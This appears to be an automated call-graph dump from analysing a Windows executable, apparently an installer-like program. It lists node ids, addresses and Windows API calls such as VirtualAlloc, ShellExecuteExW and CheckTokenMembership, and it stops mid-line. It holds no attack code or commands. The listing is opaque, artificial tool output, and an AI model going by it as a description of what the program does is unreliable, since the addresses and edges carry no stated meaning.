10691->10694 10695 402626 ??2@YAPAXI 10694->10695 10696 40266f 10694->10696 10697 402660 ??3@YAXPAX 10695->10697 10698 402651 memcpy 10695->10698 10696->10513 10697->10696 10698->10697 10700 418471 10699->10700 10701 418475 10700->10701 10702 418488 _CxxThrowException 10700->10702 10701->10604 10702->10701 12784 410c10 12785 410c17 12784->12785 12786 410c1f 12784->12786 12790 410c43 12786->12790 12791 418eb0 12786->12791 12792 410c7b 12791->12792 12793 418eb4 VirtualFree 12791->12793 12794 418e90 12792->12794 12793->12792 12795 418e94 12794->12795 12796 418e97 VirtualAlloc 12794->12796 12795->12790 12796->12790 10419 411222 ReadFile 13383 418630 13384 41863b 13383->13384 13385 41864c 13383->13385 13384->13385 13387 413384 13384->13387 13394 407201 ResetEvent 13387->13394 12460 40cd38 12462 40cd40 12460->12462 12461 41383a 132 API calls 12461->12462 12462->12461 12464 40cf77 12462->12464 12465 40cf86 12462->12465 12466 4131ad 6 API calls 12462->12466 12463 41383a 132 API calls 12463->12464 12465->12463 12465->12464 12466->12462 12877 40ccc0 12878 40d04b 12877->12878 12879 40ccce 12877->12879 12879->12878 12887 40c830 12879->12887 12881 40cce9 12882 41383a 132 API calls 12881->12882 12883 40cf86 12881->12883 12885 40cf77 12881->12885 12886 4131ad 6 API calls 12881->12886 12882->12881 12884 41383a 132 API calls 12883->12884 12883->12885 12884->12885 12886->12881 12889 40c84c 12887->12889 12891 40c89c 12887->12891 12888 418e90 VirtualAlloc 12888->12889 12889->12888 12890 418eb0 VirtualFree 12889->12890 12889->12891 12890->12889 12891->12881 10703 418acc 10712 418886 10703->10712 10705 4184fc 2 API calls 10708 418b37 10705->10708 10707 418b08 10707->10705 10711 418b57 10708->10711 10731 407199 WaitForSingleObject 10708->10731 10709 418ae1 10709->10707 10709->10711 10719 4138ba 10709->10719 10715 41889b 10712->10715 10718 418917 10712->10718 10713 418726 ??3@YAXPAX 10713->10715 10714 418a3e 10714->10709 10715->10713 10717 418703 ??2@YAPAXI memcpy ??3@YAXPAX ??2@YAPAXI 10715->10717 10715->10718 10717->10715 10718->10714 10732 413558 ??2@YAPAXI 10718->10732 10720 4138c4 10719->10720 10722 4138cc 10719->10722 10737 40721a 10720->10737 10721 4138df 10727 4138ff 10721->10727 10736 407201 ResetEvent 10721->10736 10722->10721 10724 40721a 2 API calls 10722->10724 10722->10727 10724->10721 10727->10709 10731->10708 10733 41357d ??2@YAPAXI 10732->10733 10735 4135ab 10733->10735 10735->10718 10740 4071cd CreateEventW 10737->10740 10743 40715e 10740->10743 10742 4071ee 10742->10722 10744 407162 10743->10744 10745 407165 GetLastError 10743->10745 10744->10742 10746 40716f 10745->10746 10746->10742 12451 418ed0 12452 418ed4 12451->12452 12453 418ed7 malloc 12451->12453 13475 405eeb 13476 411b84 ctype 2 API calls 13475->13476 13477 405efd 13476->13477 13497 40360e 13477->13497 13479 405f0c 13480 4036c8 18 API calls 13479->13480 13481 405f1b 13480->13481 13482 403782 18 API calls 13481->13482 13483 405f2a 13482->13483 13484 40383c 10 API calls 13483->13484 13493 405f32 13484->13493 13485 405fb0 13534 4048cc 13485->13534 13489 40455d 15 API calls 13489->13493 13490 40360e 18 API calls 13490->13493 13491 4036c8 18 API calls 13491->13493 13492 403782 18 API calls 13492->13493 13493->13485 13493->13489 13493->13490 13493->13491 13493->13492 13494 40383c 10 API calls 13493->13494 13520 404dcd GetEnvironmentVariableW 13493->13520 13528 405732 13493->13528 13494->13493 13592 411b60 ??2@YAPAXI 13497->13592 13499 403622 13500 411c48 3 API calls 13499->13500 13501 40362b 13500->13501 13502 411ca3 ctype 5 API calls 13501->13502 13503 403638 13502->13503 13504 411b84 ctype 2 API calls 13503->13504 13505 403645 13504->13505 13506 411f27 7 API calls 13505->13506 13507 403654 ??3@YAXPAX 13506->13507 13508 411c48 3 API calls 13507->13508 13509 403666 13508->13509 13510 411ca3 ctype 5 API calls 13509->13510 13511 403673 13510->13511 13512 411b84 ctype 2 API calls 13511->13512 13513 403680 13512->13513 13514 411f27 7 API calls 13513->13514 13515 40368f ??3@YAXPAX 13514->13515 13516 411b84 ctype 2 API calls 13515->13516 13517 4036a6 13516->13517 13518 411f27 7 API calls 13517->13518 13519 4036b2 ??3@YAXPAX ??3@YAXPAX 13518->13519 13519->13479 13593 411b60 ??2@YAPAXI 13520->13593 13522 404df2 13523 4042f3 7 API calls 13522->13523 13524 404dfd 13523->13524 13525 4042f3 7 API calls 13524->13525 13526 404e07 GetEnvironmentVariableW 13525->13526 13527 404e15 13526->13527 13527->13493 13529 40579b ??3@YAXPAX 13528->13529 13531 405749 13528->13531 13529->13485 13529->13493 13530 40386e CharUpperW 13530->13531 13531->13529 13531->13530 13532 411e98 memmove 13531->13532 13533 411eec 6 API calls 13531->13533 13532->13531 13533->13531 13535 4048f5 13534->13535 13536 4048e7 13534->13536 13538 404993 SHGetSpecialFolderPathW 13535->13538 13539 404bd6 ??3@YAXPAX 13535->13539 13536->13535 13537 4048ec _wtol 13536->13537 13537->13535 13538->13539 13540 4049ab 13538->13540 13541 411b84 ctype 2 API calls 13540->13541 13542 4049ba 13541->13542 13594 411b60 ??2@YAPAXI 13542->13594 13544 4049c2 13595 411b60 ??2@YAPAXI 13544->13595 13546 4049ca 13596 411b60 ??2@YAPAXI 13546->13596 13548 4049d2 13597 411b60 ??2@YAPAXI 13548->13597 13550 4049da 13598 411b60 ??2@YAPAXI 13550->13598 13552 4049e2 13599 411b60 ??2@YAPAXI 13552->13599 13554 4049ea 13600 411b60 ??2@YAPAXI 13554->13600 13556 4049f2 13601 411b60 ??2@YAPAXI 13556->13601 13558 4049fa 13602 40358b 13558->13602 13561 404b8b 9 API calls 13561->13539 13562 40358b 4 API calls 13563 404a17 13562->13563 13564 40358b 4 API calls 13563->13564 13565 404a21 13564->13565 13566 40358b 4 API calls 13565->13566 13567 404a2b 13566->13567 13568 40358b 4 API calls 13567->13568 13569 404a35 13568->13569 13570 40358b 4 API calls 13569->13570 13571 404a3f 13570->13571 13572 40358b 4 API calls 13571->13572 13573 404a49 13572->13573 13574 40358b 4 API calls 13573->13574 13575 404a53 _wtol 13574->13575 13576 404a60 13575->13576 13583 404a78 13575->13583 13580 411be5 ctype 3 API calls 13576->13580 13577 4015ec ctype 4 API calls 13578 404a9c 13577->13578 13579 404ab7 13578->13579 13581 411ce3 5 API calls 13578->13581 13582 404772 109 API calls 13579->13582 13580->13583 13584 404aad 13581->13584 13585 404abf 13582->13585 13583->13577 13586 4015ec ctype 4 API calls 13584->13586 13585->13561 13587 411ce3 5 API calls 13585->13587 13586->13579 13588 404ad3 13587->13588 13589 411ca3 ctype 5 API calls 13588->13589 13590 404ae0 CoCreateInstance 13589->13590 13590->13561 13591 404b02 13590->13591 13591->13561 13592->13499 13593->13522 13594->13544 13595->13546 13596->13548 13597->13550 13598->13552 13599->13554 13600->13556 13601->13558 13604 4035a2 13602->13604 13603 4035e4 13603->13561 13603->13562 13604->13603 13605 4015ec ctype 4 API calls 13604->13605 13605->13604 12431 418ef1 free 10397 413883 10404 407199 WaitForSingleObject 10397->10404 10399 413890 10402 4138b3 10399->10402 10405 41883f _EH_prolog 10399->10405 10408 4071f2 SetEvent 10399->10408 10409 407199 WaitForSingleObject 10399->10409 10404->10399 10410 4184fc 10405->10410 10407 41885f 10407->10399 10409->10399 10411 418511 10410->10411 10416 41824f 10411->10416 10414 41824f 2 API calls 10415 418541 10414->10415 10415->10407 10417 418260 ??3@YAXPAX ??2@YAPAXI 10416->10417 10418 41828b 10416->10418 10417->10418 10418->10414 13952 419b82 13957 401559 13952->13957 13954 419b8c 13955 4191ee 2 API calls 13954->13955 13956 419b96 13955->13956 13971 411b60 ??2@YAPAXI 13957->13971 13959 40156f 13972 411b60 ??2@YAPAXI 13959->13972 13961 401577 13973 411b60 ??2@YAPAXI 13961->13973 13963 40157f 13974 401062 13963->13974 13966 401593 13967 4015b4 ??2@YAPAXI 13966->13967 13968 4015c3 13967->13968 13970 4015ca 13967->13970 13977 415d8b 13968->13977 13970->13954 13971->13959 13972->13961 13973->13963 13975 4076d3 3 API calls 13974->13975 13976 40106a ??2@YAPAXI 13975->13976 13976->13966 13978 415db2 13977->13978 13981 411b60 ??2@YAPAXI 13978->13981 13980 415dbd 13980->13970 13981->13980 12436 410d90 12437 410daa 12436->12437 12438 410d9e 12436->12438 12440 410f96 12437->12440 12443 41383a 132 API calls 12437->12443 12444 410f8c 12437->12444 12445 4131ad 6 API calls 12437->12445 12446 410780 12437->12446 12441 41383a 132 API calls 12440->12441 12442 410fae 12441->12442 12443->12437 12445->12437 12447 4107ad 12446->12447 12448 4107c3 12446->12448 12447->12437 12448->12447 12449 40f980 memcpy 12448->12449 12450 4108cb memcpy 12448->12450 12449->12448 12450->12448 12454 418e90 12455 418e94 12454->12455 12456 418e97 VirtualAlloc 12454->12456 12955 4134a8 12958 4133b2 12955->12958 12959 4133be 12958->12959 12960 413427 12959->12960 12961 4133d7 12959->12961 12968 407199 WaitForSingleObject 12959->12968 12961->12960 12963 4133eb memcpy 12961->12963 12964 41340d 12963->12964 12964->12960 12969 407201 ResetEvent 12964->12969 12968->12961 10747 4193af __set_app_type __p__fmode __p__commode 10748 41941e 10747->10748 10749 419432 10748->10749 10750 419426 __setusermatherr 10748->10750 10759 419526 _controlfp 10749->10759 10750->10749 10752 419437 _initterm __getmainargs _initterm 10753 41948b GetStartupInfoA 10752->10753 10755 4194bf GetModuleHandleA 10753->10755 10760 407118 _EH_prolog 10755->10760 10759->10752 10763 406128 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 10760->10763 11091 40391c GetModuleHandleW CreateWindowExW GetDesktopWindow GetWindowRect SetWindowPos 10763->11091 10766 406166 10767 4070f7 MessageBoxA 10766->10767 10769 406180 10766->10769 10768 40710e exit _XcptFilter 10767->10768 11094 411b60 ??2@YAPAXI 10769->11094 10771 406196 11095 411b60 ??2@YAPAXI 10771->11095 10773 40619e 11096 411b60 ??2@YAPAXI 10773->11096 10775 4061a6 11097 405502 LoadLibraryA #17 10775->11097 10780 411be5 ctype 3 API calls 10781 4061c6 10780->10781 11126 404666 10781->11126 10783 4061ce 11140 405051 10783->11140 10785 4061e4 11158 403fdd 10785->11158 10788 405051 19 API calls 10789 4061f6 GetCommandLineW 10788->10789 10790 405051 19 API calls 10789->10790 10791 406205 10790->10791 10792 4042f3 7 API calls 10791->10792 10793 40621c wsprintfW 10792->10793 10794 40622e 10793->10794 10795 405051 19 API calls 10794->10795 10796 40623c 10795->10796 11161 4057a2 10796->11161 10799 406268 10801 4057a2 3 API calls 10799->10801 10800 406252 _wtol 10800->10799 10802 406283 10801->10802 10803 4062b0 10802->10803 10804 406287 10802->10804 10805 4057a2 3 API calls 10803->10805 11346 405da5 10804->11346 10807 4062bc 10805->10807 10808 4062c0 10807->10808 10809 4062cb 10807->10809 11368 402013 10808->11368 10812 4057a2 3 API calls 10809->10812 10813 4062db 10812->10813 10814 4042f3 7 API calls 10813->10814 10815 4062f8 GetModuleFileNameW 10814->10815 10816 406305 10815->10816 10817 406317 10815->10817 10818 40976c 74 API calls 10816->10818 10819 4057a2 3 API calls 10817->10819 10821 40628c ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 10818->10821 10833 40632a 10819->10833 10820 4064bf 11166 411c48 10820->11166 10821->10768 10824 411c48 3 API calls 10827 4064dc 10824->10827 10825 4063ff 10829 406426 10825->10829 10830 40640f _wtol 10825->10830 10826 4057a2 3 API calls 10836 406476 10826->10836 10828 406561 10827->10828 10834 411be5 ctype 3 API calls 10827->10834 10831 403fdd 2 API calls 10828->10831 10829->10826 10830->10829 10835 406581 10831->10835 10832 4063f1 10832->10821 10832->10825 10833->10820 10833->10821 10833->10825 10833->10829 10833->10832 10841 4015ec ctype 4 API calls 10833->10841 10837 406510 10834->10837 10838 411be5 ctype 3 API calls 10835->10838 10836->10820 10840 40310a 4 API calls 10836->10840 10839 411be5 ctype 3 API calls 10837->10839 10842 40658c 10838->10842 10848 406526 10839->10848 10843 4064a9 10840->10843 10841->10833 11171 40130d 10842->11171 10843->10820 10846 411c48 3 API calls 10843->10846 10846->10820 10847 4065b1 11175 411743 ??2@YAPAXI 10847->11175 10850 411c48 3 API calls 10848->10850 10849 40976c 74 API calls 10849->10847 10852 406551 10850->10852 10854 403dc8 19 API calls 10852->10854 10853 4065c3 11176 405fef 10853->11176 10856 406559 10854->10856 10858 411ca3 ctype 5 API calls 10856->10858 10858->10828 10860 4065de 10861 4065f1 10860->10861 10862 4065e4 ??3@YAXPAX 10860->10862 10864 4057a2 3 API calls 10861->10864 10871 406667 10861->10871 10862->10861 10863 406a35 ??3@YAXPAX 10865 406a43 CoInitialize 10863->10865 10872 406606 10864->10872 10873 405041 lstrcmpW 10865->10873 10866 406680 wsprintfW 10868 403dc8 19 API calls 10866->10868 10867 4066b5 11193 4054e3 10867->11193 10868->10871 10871->10863 10871->10866 10871->10867 10875 405051 19 API calls 10871->10875 10872->10863 10872->10871 11376 406013 10872->11376 10876 406a68 10873->10876 10875->10871 10879 406a79 10876->10879 10880 411be5 ctype 3 API calls 10876->10880 10878 4066c2 10881 4066d9 10878->10881 10882 4066c9 ??3@YAXPAX 10878->10882 11337 4055ff 10879->11337 10880->10879 11234 405811 10881->11234 10882->10881 10890 40976c 74 API calls 10893 406655 ??3@YAXPAX 10890->10893 10893->10871 10894 4066ea 10897 4067cc 10894->10897 10904 4066ff lstrlenW 10894->10904 11300 401341 10897->11300 11405 40b440 10904->11405 10905 4067df 10909 405fef 3 API calls 10905->10909 10911 4067e9 10909->10911 10913 405401 139 API calls 10911->10913 10914 4067f9 10913->10914 10916 405811 34 API calls 10914->10916 10918 4067fe 10916->10918 11308 4013a6 10918->11308 10924 401765 145 API calls 10927 40680a 10924->10927 10926 406716 10930 411be5 ctype 3 API calls 10926->10930 10929 405811 34 API calls 10927->10929 10933 40680f 10929->10933 10930->10897 10935 406950 10933->10935 11328 403ff2 AllocateAndInitializeSid 10933->11328 10939 405041 lstrcmpW 10935->10939 10977 406962 10939->10977 10952 4069b5 11331 405e96 10952->11331 10958 411b84 ctype 2 API calls 10958->10977 10965 40683b 11413 411b60 ??2@YAPAXI 10965->11413 10973 406843 GetCommandLineW 10978 40310a 4 API calls 10973->10978 10976 4069b7 ??3@YAXPAX 10976->10952 10977->10952 10977->10958 10977->10976 10982 405051 19 API calls 10977->10982 10983 406853 10978->10983 10986 406999 ??3@YAXPAX 10982->10986 10987 411b84 ctype 2 API calls 10983->10987 10984 405041 lstrcmpW 10988 4069e8 10984->10988 10989 405041 lstrcmpW 10986->10989 10991 40685c 10987->10991 10992 4069f6 10988->10992 10993 403dc8 19 API calls 10988->10993 10989->10977 11414 411b32 10991->11414 10994 4076d3 3 API calls 10992->10994 10993->10992 10997 406a03 10994->10997 11000 407a45 39 API calls 10997->11000 11003 406a2a 11000->11003 11443 407734 ??3@YAXPAX 11003->11443 11007 411b08 3 API calls 11009 40688e 11007->11009 11422 411a62 11009->11422 11015 406899 11018 411aec 3 API calls 11015->11018 11021 4068a8 11018->11021 11022 411be5 ctype 3 API calls 11021->11022 11025 4068b2 7 API calls 11022->11025 11425 401cc0 11025->11425 11035 406904 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11036 40692b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11035->11036 11036->10935 11092 403986 SetTimer GetMessageW DispatchMessageW KillTimer 11091->11092 11093 4039b8 GetVersionExW 11091->11093 11092->11093 11093->10766 11093->10767 11094->10771 11095->10773 11096->10775 11098 405529 11097->11098 11099 403d6d 3 API calls 11098->11099 11100 40552e 11099->11100 11101 403dc8 19 API calls 11100->11101 11102 405536 11101->11102 11103 403dc8 19 API calls 11102->11103 11104 405543 11103->11104 11105 403dc8 19 API calls 11104->11105 11106 405550 11105->11106 11107 403dc8 19 API calls 11106->11107 11108 40555d 11107->11108 11109 403dc8 19 API calls 11108->11109 11110 40556a 11109->11110 11111 403dc8 19 API calls 11110->11111 11112 405577 11111->11112 11113 403dc8 19 API calls 11112->11113 11114 405584 11113->11114 11115 405599 SHGetSpecialFolderPathW 11114->11115 11117 4055fa GetCommandLineW 11114->11117 11119 405051 19 API calls 11114->11119 11115->11114 11116 4055ad wsprintfW 11115->11116 11118 405051 19 API calls 11116->11118 11120 40310a 11117->11120 11118->11114 11119->11114 11121 403144 11120->11121 11122 403118 11120->11122 11123 40313c 11121->11123 11124 4015ec ctype 4 API calls 11121->11124 11122->11123 11125 4015ec ctype 4 API calls 11122->11125 11123->10780 11124->11121 11125->11122 11444 411b60 ??2@YAPAXI 11126->11444 11128 404758 11129 411c48 3 API calls 11128->11129 11130 404765 ??3@YAXPAX 11129->11130 11130->10783 11131 40467b 11131->11128 11132 4015ec ??2@YAPAXI memcpy ??3@YAXPAX _CxxThrowException ctype 11131->11132 11136 411c48 3 API calls 11131->11136 11445 411765 11131->11445 11448 411b60 ??2@YAPAXI 11131->11448 11449 40442e 11131->11449 11132->11131 11137 4046d6 ??3@YAXPAX 11136->11137 11455 411ce3 11137->11455 11139 4046eb ??3@YAXPAX ??3@YAXPAX 11139->11131 11468 411b60 ??2@YAPAXI 11140->11468 11142 405065 11469 411b60 ??2@YAPAXI 11142->11469 11144 40506d 11145 411be5 ctype 3 API calls 11144->11145 11146 405076 11145->11146 11147 411be5 ctype 3 API calls 11146->11147 11148 40507f 11147->11148 11470 402963 ??2@YAPAXI 11148->11470 11151 4050be ??3@YAXPAX ??3@YAXPAX 11151->10785 11152 411b84 ctype 2 API calls 11153 4050a0 11152->11153 11154 411ca3 ctype 5 API calls 11153->11154 11155 4050a9 11154->11155 11156 405051 16 API calls 11155->11156 11157 4050b5 ??3@YAXPAX 11156->11157 11157->11151 11481 403fb2 GetProcAddress 11158->11481 11160 403fe2 11160->10788 11162 4057ab 11161->11162 11163 4057f5 11162->11163 11164 4057db lstrlenW lstrlenW 11162->11164 11163->10799 11163->10800 11484 40386e 11164->11484 11167 411c54 11166->11167 11168 4064cf 11166->11168 11169 411c86 memcpy 11167->11169 11170 411c5d ??2@YAPAXI ??3@YAXPAX 11167->11170 11168->10824 11169->11168 11170->11169 11172 401315 11171->11172 11174 401337 11172->11174 11496 409eee 11172->11496 11174->10847 11174->10849 11175->10853 11177 405ff8 11176->11177 11178 40600d 11177->11178 11585 4025cc ??3@YAXPAX ??3@YAXPAX 11177->11585 11180 405401 11178->11180 11588 411743 ??2@YAPAXI 11180->11588 11182 405416 11589 404e67 11182->11589 11184 40542c 11185 405453 11184->11185 11187 405435 11184->11187 11186 405462 11185->11186 11620 405112 11185->11620 11189 405442 ??3@YAXPAX 11186->11189 11192 40543d 11186->11192 11647 4117fd 11186->11647 11190 40976c 74 API calls 11187->11190 11189->10860 11190->11192 11192->11189 11194 411be5 ctype 3 API calls 11193->11194 11195 4054f3 11194->11195 11196 411ca3 ctype 5 API calls 11195->11196 11197 4054fe 11196->11197 11198 401765 11197->11198 11758 411b60 ??2@YAPAXI 11198->11758 11200 40177b lstrlenW 11229 401790 11200->11229 11201 4030d4 lstrlenW lstrlenW _wcsnicmp 11201->11229 11202 401a89 11206 405051 19 API calls 11202->11206 11203 401a2f 11203->11202 11204 411b84 ctype 2 API calls 11203->11204 11205 401a4a 11204->11205 11785 411a27 11205->11785 11207 401ab0 11206->11207 11209 411b84 ctype 2 API calls 11207->11209 11211 401ab9 11209->11211 11210 401a5c 11212 411be5 ctype 3 API calls 11210->11212 11213 411a27 2 API calls 11211->11213 11215 401a67 ??3@YAXPAX ??3@YAXPAX 11212->11215 11216 401acd 11213->11216 11217 401a81 11215->11217 11218 411be5 ctype 3 API calls 11216->11218 11789 411e26 11217->11789 11219 401ad8 ??3@YAXPAX ??3@YAXPAX 11218->11219 11221 401af2 11219->11221 11222 411e26 memmove 11221->11222 11223 401afa 11222->11223 11224 405051 19 API calls 11223->11224 11225 401a8e ??3@YAXPAX 11224->11225 11225->10878 11227 401959 _wtol 11227->11229 11229->11201 11229->11203 11229->11225 11229->11227 11230 40310a 4 API calls 11229->11230 11231 411be5 ctype 3 API calls 11229->11231 11759 40170f 11229->11759 11770 40161a 11229->11770 11784 411b60 ??2@YAPAXI 11229->11784 11230->11229 11233 401a1a ??3@YAXPAX 11231->11233 11233->11229 11235 405041 lstrcmpW 11234->11235 11236 405823 11235->11236 11237 40586d 11236->11237 11239 411be5 ctype 3 API calls 11236->11239 11238 405041 lstrcmpW 11237->11238 11240 405889 11238->11240 11241 405836 11239->11241 11243 405041 lstrcmpW 11240->11243 11242 403dc8 19 API calls 11241->11242 11244 40583e 11242->11244 11245 40589e 11243->11245 11246 411ca3 ctype 5 API calls 11244->11246 11248 405041 lstrcmpW 11245->11248 11247 405846 11246->11247 11249 411be5 ctype 3 API calls 11247->11249 11251 4058b3 11248->11251 11250 40585d 11249->11250 11252 403dc8 19 API calls 11250->11252 11253 405041 lstrcmpW 11251->11253 11254 405865 11252->11254 11255 4058c8 11253->11255 11256 411ca3 ctype 5 API calls 11254->11256 11257 4058dc 11255->11257 11258 4058cc lstrcmpiW 11255->11258 11256->11237 11259 405041 lstrcmpW 11257->11259 11258->11257 11260 4058f2 11259->11260 11261 405041 lstrcmpW 11260->11261 11262 405919 11261->11262 11265 405924 11262->11265 11814 4056e9 11262->11814 11264 405041 lstrcmpW 11264->11265 11265->11264 11268 405947 11265->11268 11818 4056a4 11265->11818 11267 405041 lstrcmpW 11267->11268 11268->11267 11269 405969 11268->11269 11822 4056cb 11268->11822 11271 405041 lstrcmpW 11269->11271 11272 405975 11271->11272 11273 405041 lstrcmpW 11272->11273 11274 405986 11273->11274 11275 405041 lstrcmpW 11274->11275 11276 405997 11275->11276 11277 4059a1 _wtol 11276->11277 11278 4059aa 11276->11278 11277->11278 11279 405041 lstrcmpW 11278->11279 11280 4059b6 11279->11280 11281 4059c3 11280->11281 11282 4059ba _wtol 11280->11282 11283 405041 lstrcmpW 11281->11283 11282->11281 11284 4059cf 11283->11284 11285 405041 lstrcmpW 11284->11285 11286 4059e4 11285->11286 11287 405041 lstrcmpW 11286->11287 11288 4059f9 11287->11288 11289 405041 lstrcmpW 11288->11289 11290 405a0e 11289->11290 11291 405041 lstrcmpW 11290->11291 11292 405a28 11291->11292 11293 405a34 11292->11293 11294 403dc8 19 API calls 11292->11294 11295 405041 lstrcmpW 11293->11295 11294->11293 11296 405a45 11295->11296 11297 405041 11296->11297 11298 404ff9 lstrcmpW 11297->11298 11299 405046 11298->11299 11299->10894 11301 401349 11300->11301 11302 401351 ??2@YAPAXI 11301->11302 11303 40134d 11301->11303 11304 401360 11302->11304 11303->10905 11830 415be2 _EH_prolog 11304->11830 11836 416828 11304->11836 11305 40139d 11305->10905 11309 4014a1 11308->11309 11310 4013bd 11308->11310 11309->10924 11310->11309 11311 401341 152 API calls 11310->11311 11312 4013cf 11311->11312 11312->11309 11313 4013de ??2@YAPAXI 11312->11313 11314 401401 11313->11314 11315 401424 ??3@YAXPAX 11313->11315 11317 40141d 11314->11317 12294 407376 11314->12294 11315->11309 11317->11315 11318 40142f ??2@YAPAXI 11317->11318 11319 401442 11318->11319 11320 40143b 11318->11320 11322 401452 GetTickCount 11319->11322 11323 40144c 11319->11323 12299 401280 ??2@YAPAXI 11320->12299 11324 40146f 11322->11324 11323->11322 11325 40148e ??3@YAXPAX 11324->11325 11326 40147b ??3@YAXPAX 11324->11326 11325->11309 11327 40148a 11325->11327 11326->11327 11327->11309 11329 404045 11328->11329 11330 40402b CheckTokenMembership FreeSid 11328->11330 11329->10935 11412 411b60 ??2@YAPAXI 11329->11412 11330->11329 11332 405ea7 11331->11332 11333 405ee8 11331->11333 11334 411bba 2 API calls 11332->11334 11335 40562e 37 API calls 11332->11335 11333->10865 11333->10984 11334->11332 11336 405ec3 SetEnvironmentVariableW ??3@YAXPAX 11335->11336 11336->11332 11336->11333 12331 40455d 11337->12331 11341 405613 12367 403782 11341->12367 11343 40561f 12390 40383c 11343->12390 11345 405626 11347 4076d3 3 API calls 11346->11347 11348 405dc1 11347->11348 11349 403dc8 19 API calls 11348->11349 11350 405dd0 11349->11350 11351 411b84 ctype 2 API calls 11350->11351 11354 405dd9 11351->11354 11352 405e1e 11353 411ca3 ctype 5 API calls 11352->11353 11355 405e2c wsprintfW 11353->11355 11354->11352 11357 411ca3 ctype 5 API calls 11354->11357 11361 405e11 11354->11361 12422 411d89 11354->12422 11356 411ca3 ctype 5 API calls 11355->11356 11359 405e60 11356->11359 11357->11354 11360 411ca3 ctype 5 API calls 11359->11360 11362 405e6d 11360->11362 11361->11352 11364 411ca3 ctype 5 API calls 11361->11364 11363 407a45 39 API calls 11362->11363 11365 405e82 ??3@YAXPAX 11363->11365 11364->11352 12426 407734 ??3@YAXPAX 11365->12426 11367 405e93 11367->10821 11369 40201e 11368->11369 11375 402039 11368->11375 11372 40202f _wtol 11369->11372 11369->11375 11370 401cc0 18 API calls 11371 402061 11370->11371 11373 402066 GetLastError 11371->11373 11374 40206c 11371->11374 11372->11375 11373->11374 11374->10821 11375->11370 11377 411412 2 API calls 11376->11377 11378 406043 11377->11378 11379 40609a 11378->11379 11381 411b84 ctype 2 API calls 11378->11381 12427 411743 ??2@YAPAXI 11379->12427 11386 406050 11381->11386 11382 4060a2 11383 4117a8 2 API calls 11382->11383 11384 4060af 11383->11384 11385 411846 4 API calls 11384->11385 11388 4060bc 11385->11388 11387 40605c ??3@YAXPAX 11386->11387 11390 404772 109 API calls 11386->11390 11392 41115b CloseHandle 11387->11392 11393 411846 4 API calls 11388->11393 11391 406078 11390->11391 11391->11387 11395 411412 2 API calls 11391->11395 11404 406109 11392->11404 11394 4060c9 11393->11394 11396 411846 4 API calls 11394->11396 11397 40608d 11395->11397 11398 4060d6 11396->11398 11397->11387 11400 406091 ??3@YAXPAX 11397->11400 11399 41249f 2 API calls 11398->11399 11401 4060e9 11399->11401 11400->11379 11401->11387 11402 4060f5 ??3@YAXPAX 11401->11402 11403 41115b CloseHandle 11402->11403 11403->11404 11404->10863 11404->10890 11406 40b45c 11405->11406 11411 40b6e7 11405->11411 11407 40b475 memcpy 11406->11407 11408 40b48d memcpy 11406->11408 11407->10926 11409 40b4b0 11408->11409 11410 40b6d5 memcpy 11409->11410 11409->11411 11410->11411 11411->10926 11412->10965 11413->10973 11415 411b46 11414->11415 11415->11415 11416 411aa9 3 API calls 11415->11416 11417 406877 11416->11417 11418 411b08 11417->11418 11419 411b16 11418->11419 11419->11419 11420 411aa9 3 API calls 11419->11420 11421 406881 11420->11421 11421->11007 12428 411972 ??2@YAPAXI 11422->12428 11424 411a7b memcpy 11424->11015 12429 411b60 ??2@YAPAXI 11425->12429 11427 401cd5 12430 411b60 ??2@YAPAXI 11427->12430 11429 401cdd memset 11430 401d0e ShowWindow BringWindowToTop 11429->11430 11432 40310a 4 API calls 11430->11432 11433 401d58 11432->11433 11434 411be5 ctype 3 API calls 11433->11434 11435 401d61 11434->11435 11436 401d66 ??3@YAXPAX ??3@YAXPAX 11435->11436 11437 401d7b ShellExecuteExW 11435->11437 11440 401dc2 11436->11440 11438 401db0 ??3@YAXPAX ??3@YAXPAX 11437->11438 11439 401d95 11437->11439 11438->11440 11441 401da4 CloseHandle 11439->11441 11442 401d99 WaitForSingleObject 11439->11442 11440->11035 11440->11036 11441->11438 11442->11441 11443->10863 11444->11131 11458 4116ab ??2@YAPAXI 11445->11458 11447 41176f 11447->11131 11448->11131 11459 411b60 ??2@YAPAXI 11449->11459 11451 404439 11452 40446c 11451->11452 11453 4042f3 7 API calls 11451->11453 11452->11131 11454 404451 MultiByteToWideChar 11453->11454 11454->11452 11460 4119b8 11455->11460 11458->11447 11459->11451 11461 4119ca 11460->11461 11462 4119de memcpy 11460->11462 11464 4118aa 11461->11464 11462->11139 11465 411901 _CxxThrowException 11464->11465 11466 4118ba 11464->11466 11466->11465 11467 4118c2 ??2@YAPAXI memcpy ??3@YAXPAX 11466->11467 11467->11462 11468->11142 11469->11144 11471 402972 11470->11471 11473 40297d 11470->11473 11476 4025ab 11471->11476 11474 4027ac 3 API calls 11473->11474 11475 402989 11474->11475 11475->11151 11475->11152 11477 411bba 2 API calls 11476->11477 11478 4025b9 11477->11478 11479 411bba 2 API calls 11478->11479 11480 4025c5 11479->11480 11480->11473 11482 403fd9 11481->11482 11483 403fcd GetNativeSystemInfo 11481->11483 11482->11160 11483->11160 11485 403887 11484->11485 11491 4038c4 11484->11491 11486 403064 CharUpperW 11485->11486 11487 4038d5 11485->11487 11485->11491 11486->11485 11492 403064 11487->11492 11490 403064 CharUpperW 11490->11491 11491->11163 11493 40306c 11492->11493 11494 403072 11492->11494 11493->11494 11495 40307c CharUpperW 11493->11495 11494->11490 11495->11494 11507 418726 11496->11507 11506 409f2a 11506->11174 11508 41872f 11507->11508 11509 409f01 11508->11509 11510 413a69 ??3@YAXPAX 11508->11510 11511 409a19 ??2@YAPAXI 11509->11511 11510->11508 11512 409a2f 11511->11512 11547 4113d0 11512->11547 11514 409a4b 11514->11506 11518 409dd3 ??2@YAPAXI 11514->11518 11515 409a47 11515->11514 11516 409a69 FindFirstFileW 11515->11516 11516->11514 11517 409a7e FindClose 11516->11517 11517->11514 11519 409de2 11518->11519 11520 4027ac 3 API calls 11519->11520 11521 409df9 11520->11521 11522 409dfd 11521->11522 11556 411b60 ??2@YAPAXI 11522->11556 11524 409e2b 11557 409ab1 11524->11557 11527 409e4a 11578 411b60 ??2@YAPAXI 11527->11578 11528 409e3a ??3@YAXPAX 11539 409edf 11528->11539 11531 411b08 3 API calls 11532 409ea0 11531->11532 11533 411be5 ctype 3 API calls 11532->11533 11534 409eaa ??3@YAXPAX 11533->11534 11535 409a19 